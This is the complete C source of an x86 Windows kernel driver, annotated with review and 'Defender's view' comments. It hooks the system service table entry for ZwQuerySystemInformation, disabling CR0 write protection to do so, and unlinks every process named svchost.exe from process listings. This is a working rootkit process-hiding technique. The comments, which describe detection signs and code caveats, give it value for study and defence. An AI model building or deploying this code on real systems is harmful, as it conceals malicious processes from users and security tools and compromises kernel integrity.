- #include "ntddk.h"
- #include "string.h"
-
- #define IOCTL_EVENT_MSG CTL_CODE(FILE_DEVICE_UNKNOWN, 0x927, METHOD_BUFFERED , FILE_ANY_ACCESS)
- #pragma warning(disable: 4047 4018)
- #ifdef __cplusplus
- extern "C"
- #endif
-
- // Thread record that follows each _SYSTEM_PROCESSES entry in the buffer
- // returned for SystemInformationClass 5 (SystemProcessInformation).
- // NOTE(review): undocumented NT layout; field order and sizes are OS-build
- // dependent — confirm against the target kernel before relying on offsets.
- struct _SYSTEM_THREADS
- {
- LARGE_INTEGER KernelTime; // kernel-mode time count
- LARGE_INTEGER UserTime; // user-mode time count
- LARGE_INTEGER CreateTime; // thread creation time
- ULONG WaitTime; // wait time
- PVOID StartAddress; // thread start address
- CLIENT_ID ClientIs; // thread and process IDs (field name kept as in the original)
- KPRIORITY Priority; // priority
- KPRIORITY BasePriority; // base priority
- ULONG ContextSwitchCount; // context switch count
- ULONG ThreadState; // thread state
- KWAIT_REASON WaitReason; // reason the thread is waiting
- };
-
- // Per-process record for SystemInformationClass 5 (SystemProcessInformation).
- // Records are chained by NextEntryDelta, a byte offset to the next record
- // (0 terminates the chain); HookZwQuerySystemInformation rewrites that field.
- // NOTE(review): undocumented layout; "Only For 2000" on IoCounters is the
- // original author's remark — verify the structure against the target build.
- struct _SYSTEM_PROCESSES
- {
- ULONG NextEntryDelta; // byte offset to the next process record; 0 means there is no further record
- ULONG ThreadCount; // number of threads
- ULONG Reserved[6]; //
- LARGE_INTEGER CreateTime; // process creation time
- LARGE_INTEGER UserTime; // total user-mode time of all threads in the process
- LARGE_INTEGER KernelTime; // total kernel-mode time of all threads in the process
- UNICODE_STRING ProcessName; // image name of the process
- KPRIORITY BasePriority; // default priority of the process's threads
- ULONG ProcessId; // process ID
- ULONG InheritedFromProcessId; // ID of the process the handles were inherited from
- ULONG HandleCount; // number of handles the process has open
- ULONG Reserved2[2]; //
- VM_COUNTERS VmCounters; // virtual memory usage statistics
- IO_COUNTERS IoCounters; // I/O statistics, Only For 2000
- struct _SYSTEM_THREADS Threads[1]; // array describing the threads of the process
- };
-
- #pragma pack(1)
-
- // Mirror of the kernel's system service descriptor (the SSDT descriptor).
- // Packed to 1 byte so the field offsets line up with the kernel object.
- // NOTE(review): x86 field widths; this layout does not hold on x64.
- typedef struct _ServiceDescriptorEntry {
- unsigned int *ServiceTableBase; // system service address table
- unsigned int *ServiceCounterTableBase; // per-service usage counters
- unsigned int NumberOfServices; // number of services in the table
- unsigned char *ParamTableBase; // per-service parameter-count table
- }ServiceDescriptorTableEntry, *PServiceDescriptorTableEntry;
-
- #pragma pack()
-
- // Address of the system service table descriptor, exported by the x86
- // kernel. This is the object DriverEntry/DriverUnload patch below.
- // NOTE(review): not available as an export on x64 kernels — x86 only.
- extern PServiceDescriptorTableEntry KeServiceDescriptorTable;
-
- // Undocumented Zw API. Class 5 (SystemProcessInformation) fills the buffer
- // with the _SYSTEM_PROCESSES chain that the hook below walks.
- NTSYSAPI
- NTSTATUS
- NTAPI
- ZwQuerySystemInformation(
- IN ULONG SystemInformationClass, // which class of system information to query
- IN PVOID SystemInformation, // buffer that receives the system information
- IN ULONG SystemInformationLength, // size of the receiving buffer
- OUT PULONG ReturnLength); // size actually received
-
- // Function-pointer type with the signature of ZwQuerySystemInformation.
- typedef NTSTATUS (*REALZWQUERYSYSTEMINFORMATION)
- (
- IN ULONG SystemInformationClass,
- IN PVOID SystemInformation,
- IN ULONG SystemInformationLength,
- OUT PULONG ReturnLength);
-
- // Original SSDT entry saved by DriverEntry; the hook forwards every call to
- // it and DriverUnload writes it back. Only meaningful between load and unload.
- REALZWQUERYSYSTEMINFORMATION RealZwQuerySystemInformation;
-
- // Image name that the hook drops from process listings. It is re-initialised
- // with RtlInitUnicodeString on every call of HookZwQuerySystemInformation.
- UNICODE_STRING hide_process_name;
- // CR0 as read before clearing CR0.WP; written back after the SSDT is patched.
- ULONG CR0VALUE;
-
- // Replacement installed in the SSDT slot of ZwQuerySystemInformation.
- NTSTATUS HookZwQuerySystemInformation(
- IN ULONG SystemInformationClass,
- IN PVOID SystemInformation,
- IN ULONG SystemInformationLength,
- OUT PULONG ReturnLength);
-
- // Unload routine: writes the original SSDT entry back.
- VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject);
-
-
- // Driver entry point. Saves the current SSDT entry for
- // ZwQuerySystemInformation in RealZwQuerySystemInformation and replaces it
- // with HookZwQuerySystemInformation. RegistryPath is unused. Always returns
- // STATUS_SUCCESS.
- //
- // Defender's view: once this has run, the SSDT slot points into this driver's
- // image instead of ntoskrnl — the condition SSDT-integrity scanners and, on
- // x64, Kernel Patch Protection report. The __asm blocks make the driver
- // x86-only (x64 MSVC has no inline assembly).
- NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
- {
-
- DriverObject->DriverUnload = DriverUnload;
-
- // Clear CR0.WP (bit 16, mask 0fffeffffh) so the read-only page holding the
- // service table can be written; the original CR0 is kept in CR0VALUE.
- __asm{
- mov eax, cr0
- mov CR0VALUE, eax
- and eax, 0fffeffffh //DisableWriteProtect
- mov cr0, eax
- }
-
-
- // Save the original ZwQuerySystemInformation entry. The slot index is the
- // DWORD at ZwQuerySystemInformation+1 — presumably the immediate of the x86
- // Zw stub's "mov eax, <service index>"; confirm for the target build.
- RealZwQuerySystemInformation = (REALZWQUERYSYSTEMINFORMATION)( ((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase[*(PULONG)((PUCHAR)ZwQuerySystemInformation+1)] );
-
- //Hook: point the slot at the replacement
- ((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase[*(PULONG)((PUCHAR)ZwQuerySystemInformation+1)] = HookZwQuerySystemInformation;
-
- //EnableWriteProtect: restore the saved CR0
- __asm
- {
- mov eax, CR0VALUE
- mov cr0, eax
- }
- DbgPrint(("Driver has been Load !")); // double parentheses are just a parenthesised expression
- return STATUS_SUCCESS;
- }
-
-
- // Unload routine. Writes RealZwQuerySystemInformation back into the SSDT
- // slot using the same CR0.WP handling as DriverEntry. pDriverObject is
- // unused; no other state is released here.
- //
- // Defender's view: the slot reverting to an ntoskrnl address and the
- // DbgPrint below are both visible to a kernel debugger or SSDT monitor.
- VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject)
- {
-
-
- // Clear CR0.WP so the service table page can be written (CR0 saved in CR0VALUE).
- __asm{
- mov eax, cr0
- mov CR0VALUE, eax
- and eax, 0fffeffffh //DisableWriteProtect
- mov cr0, eax
- }
-
-
- // Put the original entry back (same slot index computation as DriverEntry).
- ((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase[*(PULONG)((PUCHAR)ZwQuerySystemInformation+1)] = RealZwQuerySystemInformation;
-
- //EnableWriteProtect: restore the saved CR0
- __asm
- {
- mov eax, CR0VALUE
- mov cr0, eax
- }
-
-
-
- DbgPrint(("Driver has been Unload !"));
- return;
-
- }
-
- // SSDT replacement for ZwQuerySystemInformation. Every call is forwarded to
- // the saved original; when that succeeds and SystemInformationClass is 5
- // (SystemProcessInformation) the returned _SYSTEM_PROCESSES chain is walked
- // and each record whose ProcessName equals hide_process_name ("svchost.exe",
- // compared case-insensitively) is unlinked by adding its NextEntryDelta to
- // the previous record's. The original's status code is returned unchanged.
- //
- // Defender's view: hidden records are skipped, not erased — their bytes stay
- // in the buffer and ReturnLength is not adjusted, so a consumer that compares
- // the walked length with *ReturnLength, or cross-checks the PID set against
- // another enumeration source, observes the gap. Because the filter is by
- // image name, every process with that name disappears, not one specific PID.
- NTSTATUS HookZwQuerySystemInformation(
- IN ULONG SystemInformationClass,
- IN PVOID SystemInformation,
- IN ULONG SystemInformationLength,
- OUT PULONG ReturnLength)
- {
- NTSTATUS rc;
- struct _SYSTEM_PROCESSES *curr;// record currently under inspection
- struct _SYSTEM_PROCESSES *prev = NULL; // last record kept in the chain, NULL until one is kept
- // Re-initialised on every call; only the image name is compared.
- RtlInitUnicodeString(&hide_process_name,L"svchost.exe");
-
-
- // Let the real service fill the caller's buffer first.
- rc = (RealZwQuerySystemInformation) (
- SystemInformationClass,
- SystemInformation,
- SystemInformationLength,
- ReturnLength);
-
- if(NT_SUCCESS(rc))
- {
- // 5 == SystemProcessInformation; all other classes pass through untouched.
- if(5 == SystemInformationClass)
- {
-
- curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
-
- // Step past the first record to what the original author calls the
- // first "system" process entry; that record is never examined.
- if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
-
-
-
- while(curr)
- {
- // Third argument 1 = CaseInSensitive.
- if (RtlCompareUnicodeString(&hide_process_name, &curr->ProcessName, 1) == 0)
- {
- // Found a record to hide.
- if(prev)
- {
-
- if(curr->NextEntryDelta)
- {
- // Record is in the middle: make prev skip over it.
- prev->NextEntryDelta += curr->NextEntryDelta;
- }
- else
- {
- // Record is the last one: prev becomes the tail.
- prev->NextEntryDelta = 0;
- }
- }
- else
- {
- if(curr->NextEntryDelta)
- {
- // Record is the first examined one. NOTE: this changes only this
- // function's local copy of the SystemInformation pointer; the
- // caller's pointer and buffer are not affected by it.
- (char *)SystemInformation += curr->NextEntryDelta;
- }
- else
- {
- // Same caveat: only the local parameter is cleared.
- SystemInformation = NULL;
- }
- }
- // Move on if the chain continues; otherwise the walk is finished.
- // prev is deliberately left pointing at the last kept record.
- if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
- else
- {
- curr = NULL;
- break;
- }
- }
-
- if(curr != NULL)
- {
- // Keep this record: it becomes the predecessor, then advance.
- prev = curr;
- if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
- else curr = NULL;
- }
-
- } // end while(curr)
- }
- }
- return rc;
- }